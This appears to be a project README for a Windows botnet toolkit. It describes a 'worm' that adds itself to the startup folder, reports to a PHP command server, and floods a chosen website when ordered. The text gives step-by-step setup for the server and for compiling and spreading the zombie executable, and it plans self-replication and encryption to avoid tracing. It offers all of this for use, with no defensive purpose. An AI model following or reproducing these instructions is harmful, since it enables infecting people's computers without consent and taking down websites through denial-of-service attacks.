A toolkit to perform Distributed Denial of Service Attack using windows system, for which I designed a worm that embeds into windows startup upon it's first trigger. And then after will automatically start whenever the system is turned on.
- It's really simple to start with, just go ahead and clone the repository on a windows machine.
- Now configure your PHP server from where you can keep an eye on systems that are infected by this Worm.
- Do copy all the php files in
server
directory to suitable hosted directory on your server.
- Now run
zombie.cpp
in any suitable C++ compiler. - Do remember to replace
SERVER_URL
macro definition with link of your server. - This will register zombie executable file to startup folder making sure that program is triggered upon windows boot.
- This executable can be shared on different windows system and for all these notorious zombies, you have the control.
- The interface is quite simple to use.
- Enter the site you want to attack and ping limit (iterations).
- Woohooo, all your zombies on windows system through out the world are doing nasty stuff for you.
- Soon, if number of live bots are enough, the site will go down.
- A sample version is hosted on here
- Further I want to make the worm more independent.
- It must have cloning and self replicating properties.
- Also encrypt it, making it very difficult to trace.
- And many more mischievous ideas.
- Please feel free to raise issues.
- Pull Requests are utmost welcomed.